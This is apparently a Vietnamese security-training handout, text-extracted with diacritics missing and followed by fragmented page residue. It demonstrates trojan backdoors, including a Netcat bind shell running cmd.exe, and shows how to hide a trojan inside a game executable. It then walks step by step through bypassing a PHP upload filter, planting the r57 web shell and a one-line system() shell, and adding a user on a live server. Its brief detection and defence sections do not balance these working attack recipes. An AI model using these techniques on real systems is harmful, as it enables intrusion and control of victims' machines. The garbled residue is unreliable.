cho doanh nghip ca mnh cng nh nhng d liu quan trng ca chng ta. Trong phn ny ti gii thiu vi cc bn nhng loi Trojan sau: - Tini - iCmd - Netcat - HTTP RAT a. Trojan Tini Bt k mt my tnh no nu b nhim Trojan ny u cho php Telnet qua Port 7777 khng cn bt k thng tin xc thc no. - Trojan ny nhim vo h thng th ch cn chy mt ln hoc Enter file l OK mi th hon tt v i nhng thng tin Telnet ti port 7777. - Trn my 192.168.1.33 chy file tini.exe gi ti ng trn bt k my no cng c th dng lnh: Telnet 192.168.1.33 7777 l c th console vo c my .
I-train.com.vn
b. iCmd Trojan Tng t nh Tini Trojan nhng khc mt iu l cho php la chn port telnet v Password truy cp vo my b nhim trojan ny. VD: My b nhim Trojan chy file iCmd.exe vi cu lnh - iCmd.exe vne 8080 C ngha my ny enable telnet trn port 8080 v password l vne Trong v d ny ti file: iCmd.exe ti th mc vnexperts.net trn C:\
- Trn my khc ti c th telnet ti my ny vi cu lnh: - Telnet <ip> port - Nh v d trn ti g: telnet 192.168.1.33 8080 H thng bt ti nhp password ti g vne vo v Enter
I-train.com.vn
V kt qu
c. Netcat Trojan. Trojan ny cho php chng ta la chn kh nhiu Options nh Port, chy ch n, cho php telnet .. chy Trojan ny ti g cu lnh:
Nc.exe L p <port> -t e <programe> -L l hot ng ch nghe -p l Port s dng nghe. -t cho php s dng Telnet -e chy mt chng trnh no . Trn v d ny ti chy vi cu lnh - Nc.exe L p 8800 t e cmd.exe
Gi th ti c th ng bt k trn my no c th telnet ti my ny qua cng 8800, v hon ton c th kim sot c my tnh qua giao din command line.
I-train.com.vn
d. HTTP RAT Vi tnh nng hot ng nh mt Web Server c lp trnh sn cho php qun l my tnh trn giao din Web. Bn hon ton c th thc hin c trn Internet, khi mt my nhim Trojan ny s t ng gi mail v cho bn qua cu hnh.
I-train.com.vn
Gi ng trn bt k my no bn cng c th vo my ny qua ca s ca mt trnh duyt web bt k: http://192.168.1.33 Ti c th chy xa hay download bt k file no t my nn nhn
e. ICMP Trojan S dng tunnel l ICMP gn nh c s ng ca bt k firewall no hay cc h thng. - Trn my nn nhn s dng ICMP Trojan Server chng ta phi ci Trojan ny vi cu lnh
I-train.com.vn
- Ngi trn bt k my no bn s dng ICMPsend remote ti h thng b nhim ICMP trojan
Trn thc t cn rt nhiu loi Trojan khc bn c th tm hiu trn cc trang web chuyn v security, trong bi vit ny ti ch Demo mt s loi Trojan dng trainning m thi.
I-train.com.vn
6. Cch n mt hoc nhiu Trojan vo mt file .exe hay file chy bnh thng My phn bn trn l cch s dng Trojan c bn. V d bn mun s dng con trojan l iCmd.exe bn phi lm th no? Copy file vo my v chy vi cu lnh iCmd.exe vne 8800? iu ny khng th thc hin bi ai cho bn ngi trn my . Vy lm th no ly nhim Trojan ny vo my ca nn nhn? Tht khng may nhng k tn cng khn ngoan n mt hay nhiu Trojan vo mt file Exe bnh thng, nh mt chng trnh c, mt file exe b ci windows, file chy ca cc phn mm min ph m c khi n lun vo b ci cc chng trnh dit virus. Cch n Trojan vo file .exe l cng ngh Wrapper. Cc phn mm thng dng: - One file EXE Maker - Yet Another Binder - Pretator Wrapper. a. S dng One file EXE Maker du v chy file iCmd.exe Download b ci ca phn mm ny ci ra my sau l chy ghp cc file File EXE m ti la chn l mt chng trnh c Caro rt ph bin Fiver6_8.exe. - File c caro ti chy bnh thng - file iCmd.exe ti chy n v copy vo h thng - Cu lnh thm trn file iCmd.exe ti chn l vne 8800 cho php telnet vo port 8800 v password l vne.
I-train.com.vn
Nhn Save hon thnh qu trnh. - Ti save ra vi tn l caro.exe Nhn dung lng ca file ti thy: - iCmd.exe dung lng 36KB - Fiver6_8_en.exe dung lng 310K - Caro.exe c to t hai file trn dung lng 353KB
I-train.com.vn
Gi ti th chy file Caro.exe Ch c ca s nh c caro c bt ra nhng c mt file iCmd.exe c hot ng, kim tra trong Task Manager:
I-train.com.vn
ng trn bt k my no ti cng c th remote ti my ny qua port 8800 v password l vne
I-train.com.vn
Trong bi vit ny ti ch Demo mt chng trnh n file Exe cc bn c th tm kim cc phn mm ny trn Internet. 7. Cch pht hin Trojan. C ba nguyn l ca bt k chng trnh Trojan no: - Mt trojan mun hot ng phi lng nghe cc request trn mt cng no - Mt chng trnh ang chy s phi c TN trong Process List - Mt chng trnh Trojan s lun chy cng lc khi my tnh khi ng. a. Pht hin Port s dng bi Trojans - Dng cu lnh Netstat an trong windows bit ht thng ang lng nghe trn cc port no + Hnh di ta thy c port 7777 th ra l port ca Tini Trojan + My ca ti u c s port no l 8800 sao li ang ch nghe v c my ang kt ni n nh chc l ca Trojans
I-train.com.vn
- Dng phn mm Fport - Dng phn mm TCPView Tht may ti c th xem ton b cc port ang s dng v chng trnh g ti ang s dng port no T y ti c th kim tra cc dch v mng ca ti vi nhng Port nghi ng ti c th dng Firewall ng li.
I-train.com.vn
b. Cch pht hin cc chng trnh ang chy - Dng phn mm Process Viewer tt c cc Process s c hin th d c ang chy ch n v khng hin trn Task Manager ca Windows.
I-train.com.vn
c. Tm mt chng trnh chy lc khi ng - Trong Satup - Trong Registry: a s s nm ti y: Chng ta s dng cu lnh Msconfig trong Table Starup chng trnh no mun chy t ng s phi nm ti y.
I-train.com.vn
Trong v d ny ti thy c file nc.exe chy lc khi ng v tr ca n l ti folder c:\vnexperts.net
8. Cch phng chng Trojans v Backdoor - Khng s dng cc phn mm khng tin tng (i khi tin tng vn b dnh Trojans) - Khng vo cc trang web nguy him, khng ci cc ActiveX v JavaScript trn cc trang web bi c th s nh km Trojans - Ti quan trng l phi update OS thng xuyn - Ci phn mm dit virus uy tn: Ti hay dng: Kaspersky Internet Security, Norton Internet Security, v Mcafee Total Security, nhng nghe ni cn rt nhiu phn mm dit Virus v chng Trojan hay khc. Sau khi ci cc phn mm ny bn hy update n thng xuyn.
I-train.com.vn
9. Kt lun. Trong bi vit ny ti trnh by cc khi nim c bn th no l Trojans Backdoor, cch chng ly nhim vo h thng. Mt vi trojans demo cho cc bn hiu s nguy him ca Trojan. Quan trng nht l cc bn hy bo v chnh mi trng ca mnh trc cc tn cng t bn ngoi. Theo Tocbatdat ca Vnexperts Research Department
I-train.com.vn
Phn VIII. K thut hack Web s dng upload file PHP v cch phng chng
Website thng mi hay cc forum t pht trin t PHP cho php upload hnh nh rt d b hacker tn cng qua cch upload nhng Shell ln v chim quyn iu khin. Trong bi vit ny ti s hng dn cc bn k thut upload mt file PHP chim quyn iu khin my ch v cch phng chng li ny i vi cc qun tr website. L hng ny khi kim tra vi cc Tools scan uy tn nh: Acunetix, IBM App Scan.. ch mc Low c ngha l mc nguy him thp nhng li c th chim quyn iu khin web server. Vi mc ch quan trng nht ca bi vit l cho ngi qun tr web hiu c cc nguy c tim n, cc cch khai thc v phng v ra sao. Bi vit c chia ra cc mc 1. Tools cn thit 2. K thut upload file PHP v chim quyn iu khin my ch web 3. K thut bo mt cho my ch web fix l hng bo mt ny
I-train.com.vn
I. Cc tools cn thit - Burpsuite_v1.3 - Java framework - firefox - website b li - r57vn.php 1. Burpsuite_v1.3 y l mt Tool vit trn nn Java nn mun chy c tools ny phi ci Java trc. Tools ny lm vic nh mt web proxy nhng n l mt intercepting proxy. Intercepting proxy: l mt proxy cho php iu chnh ni dung ca gi tin ngi dng truyn nn web server. Do khi ta s dng tools ny cho php thay i ni dung yu cu t trnh duyt web gi ln web server. Link download: http://www.portswigger.net/suite/burpsuite_v1.3.zip 1. Java y l b ci Java cho php cc chng trnh java chy trn my tnh Link download: http://sun.com 2. firefox S dng firefox bi mt s k thut khng s dng IE c 3. Website b li Khng khuyn co mi ngi i hack cc trang web khc. Hacker m trng ch hack cc trang web c s cho php ca ngi ch qun website. Bi
vit ny ti s hack trc tip vo trang web ca ti l trang http://tocbatdat.com Trang web pht trin trn nn php v dnh l hng. 4. r57vn.php L mt Shell cho php lm nhiu tc v trn webserver mt cch n gin II. K thut upload file PHP v chim quyn iu khin my ch web 1. Chun b Bc 1: ci t Java Bc 2: Download burpsuite_v1.3 v gii nn ra s thy file .jar th dng li Bc 3: Ci t firefox Bc 4: Chun b trnh duyt IE (s dng IE upload file) bi cu hnh proxy trn IE n gin hn Bc 5: Kt ni Internet v truy cp trang web http://tocbatdat.com (trong trng hp website ny ti fix l hng cc bn c th kim web khc dnh l hng ny demo). 2. Thc hin Upload file php ln website a. Kin thc chung Hu ht cc trang web hin nay u ch cho upload mt s dng file nht nh nh: jpg, gif, v khng cho php upload cc nh dng file khc vy chng ta lm th no upload mt file PHP ln website ny. Trc ht chng ta phi hiu c website lm th no pht hin ra file ny khng phi l cc nh dng cho php c hai cch website kim tra: + Kim tra nh dng file (dng ny rt thng dng) + Kim tra ui file (dng ny th khng nhiu)
V d mt on code php upload v check file: ************* <?php if($_FILES['userfile']['type'] != "image/gif") { echo "Sorry, we only allow uploading GIF images"; exit; } $uploaddir = 'uploads/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo "File is valid, and was successfully uploaded.\n"; } else { echo "File uploading failed.\n"; } ?> ************ - on code ny cho php kim tra ch cho php upload file nh dng image/gif (content type) vt qua chng ta ch cn chnh sa content type l c th upload c - C on code cho php kim tra ni dung file pht hin file c phi l file vt qua chng ta to ra mt file nh dng .gif hay jpg ri dng notepad chnh sa, thm on code php vo cui file .gif ri i ui thnh .php. Khi upload file ny h thng s kim tra ni dung v pht hin y l file gif l cho upload b. Thc hin Phng n 1 Upload shell - Ci java
I-train.com.vn
- Chy chng trnh Burpsuite_v1.3 lm Intercepting Proxy. Nhn p vo file .jar gii nn t b download c
I-train.com.vn
Chy chng trnh Burpsuite
Mc nh chng trnh ny ch lm proxy cho chnh my chy chng trnh, cc my khc c th s dng chng trnh ny lm proxy phi Vo tab proxy chn Options ri c th Edit ty bin port s dng (mc nh l 8080) b du check box loopback ony
I-train.com.vn
I-train.com.vn
Chuyn sang tab Intercept cu hnh cc mode hot ng ca Intercepting proxy - Ch Intercept on: y l ch hot ng. Nu mt ngi t my tnh ny lm proxy th ton b qu trnh truy cp ra internet u b proxy ny qun l. Khi mt request t trnh duyt ti Proxy, n s pht hin ni dung c th chnh sa v forward i th mi ti my ch web - Chng ta tt ch ny bng cch nhn vo Intercept on s thnh off. Mc ch khi ngi dng s dng phn mm ny lm proxy th vn c th vo Internet bnh thng. Chng ta cng tt tnh nng ny ch bt ln khi c yu cu upload v chnh sa ni dung gi tin
Vo IE chnh proxy vo a ch 127.0.0.1 port 8080. IE IE options tab connection nhn vo nt LAN Settings
I-train.com.vn
Th vo Internet sau khi t proxy (vo trang tocbatdat.com). vo c
I-train.com.vn
ng k mt Account c th ng mt bi vit v c hnh nh. i vi cc forum hay website khc cng cn ng k mt acc c th ng bi vit. Login vo bng mt account ri ng mt bi ln website - Phn hnh nh ti upload Shell r57vn.php - Ch l cha nhn nt hon thnh Upload bi m ti s chnh sa trong Proxy bt tnh nng Intercept On ln ton b ni dung t trnh duyt s chuyn vo proxy - Sau ti s vo proxy chnh sa v forward i
I-train.com.vn
I-train.com.vn
- Bt Intercept On
- Chuyn sang IE nhn nt ng bn hay ng bi) upload thng tin ln websever. Do t proxy nn ton b thng tin s chuyn vo proxy
I-train.com.vn
Vo Proxy kim tra chng ta s thy thng tin: - Accept (ch cho php cc nh dng ti dng th 2) - Content-Type ca chng ta li l: text/plain khng lm trong danh mc c upload nn nu chng ta c forward i lun th file r57vn.php chc chn khng upload c. - Ti chnh li Content-Type l image/jpeg l ok v upload ln thnh cng
I-train.com.vn
- Chnh sa content type thnh image/jpeg Nhn forward upload file ny ln website
- OK ti upload c file r57vn.php ln web server nhng by gi ti s vo u chy file ny v chnh xc ra l ng dn file ny l th no - S dng Burpsuite vi tnh nng Expand Branch cho php bn MAP ton b website sau ti tm vo mc Upload s thy file
I-train.com.vn
- Ti tm kim trong mc upload c file php no hay khng - File r57vn.php c i thnh file dvt_126888126926.php (mc nh hu ht cc website s i tn file upload) - tm file va upload ln ti c th s dng tools ny hoc c th s dng cc tools scan web khc nh Acunetix hoc IBM App Scan
I-train.com.vn
I-train.com.vn
Gi ti chy file ny: y chnh l con Shell r57vn.php ti upload thnh cng ln my ch web. Vi shell ny ti c th lm c kh nhiu tnh nng
I-train.com.vn
c. Thc hin Phng n 2 Chy command line trn server i vi mt s website kim tra ni dung ca file upload xem file c phi l nh dng c cho php hay khng th chng ta c th lch qua bng cch. Bc 1: Dng Paint to ra mt file .gif Bc 2: Dng notepad m file .gif ny Bc 3: thm vo cui ni dung file cu lnh: <?system($_GET["cmd"]);?> Bc 4: i file ny thnh file .php (s vt qua c cc website check ni dung file) Bc 5: Dng k thut trn Upload file ny ln website Bc 6: Tm v tr file (URL ca file) Bc 7: chy file ny bng cch: http://..../...php?cmd=cu lnh trong windows hoc linux Bc 1: Dng Paint to file .gif. Vo paint vit ch g cng dc save as ra dng file .gif. Ti Save ra file tobatdat.gif
I-train.com.vn
I-train.com.vn
Bc 2 & 3: Dng notepad m file ny sau thm vo cui on m: <?system($_GET["cmd"]);?> ri save li
Bc 4: i file ny sang file .php Bc 5: S dng Intercepting Proxy upload file ny ln webserver
I-train.com.vn
Chng ta s thy d liu khi Brower Upload ln server vi ContentType tr thnh: image/gif bi on m kim tra ni dung file s pht hin ra y l file nh. Gi chng ta ch cn forward i l OK
I-train.com.vn
I-train.com.vn
Bc 6: Kim tra URL. Sau khi Upload file ny ln webserver ti dng tools Burpsuite expand branch s pht hin file mi upload ln
Pht hin file:
I-train.com.vn
Bc 7: Chy command line trn my ch web Dng firefox vo Url ny http://tocbatdat.com/vnss_raovat/upload/dvt_1268823510.php
I-train.com.vn
I-train.com.vn
Chng ta th g thm http://tocbatdat.com/vnss_raovat/upload/dvt_1268823510.php?cmd=n et user tocbatdat100 yeuemnhieu /add V kt qu
Gi bn c th g bt k cu lnh no trn my ch web. Nu my ch linux th bn g cu lnh linux, cn my ch web l windows bn g cu lnh trong windows.
I-train.com.vn
III. K thut bo v my ch - i vi nh lp trnh web phi ngn chn upload theo ui file - Theo ni dung ca file - Ci t chng trnh dit virus s ngn chn khng cho upload cc dng Shell - Thng xuyn s dng cc chng trnh Scan pht hin l hng bo mt
I-train.com.vn

Tan Cong Va Bao Ve He Thong - Tocbatdat.i-Train - Com.vn

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Tan Cong Va Bao Ve He Thong - Tocbatdat.i-Train - Com.vn

Uploaded by

Copyright:

Available Formats

Copyright by Tocbatdat

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

Research manager I-train.com.vn

Research manager I-train.com.vn

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

Phn I. Scan port ton tp v cch phng chng

Professional Training Service

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

3. Khi Client mun kt thc mt phin lm vic vi Server

Professional Training Service

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

Switch My tn cng My b tn cng Ci Windows 2003

Professional Training Service

Research manager I-train.com.vn

Research manager I-train.com.vn

- Thit lp trong Group Policy khi g Password sai 5 ln s b lock 30 pht

Professional Training Service

Research manager I-train.com.vn

Sau Khi Import Password t file SAM vo s c

Professional Training Service

Research manager I-train.com.vn

M file TXT exports ra ta c d liu password c m ho

Research manager I-train.com.vn

Ti chn phng thc tn cng Brute Force

Professional Training Service

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

Research manager I-train.com.vn

Ti s s dng chng trnh ny kim tra my 192.168.1.8

Professional Training Service

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn

- Sau bt MSFWeb ti vo IE g a ch: http://127.0.0.1:55555

Professional Training Service

Research manager I-train.com.vn

- La trn trong Filter Modules l Windows 2003

Professional Training Service

Research manager I-train.com.vn

Professional Training Service

Research manager I-train.com.vn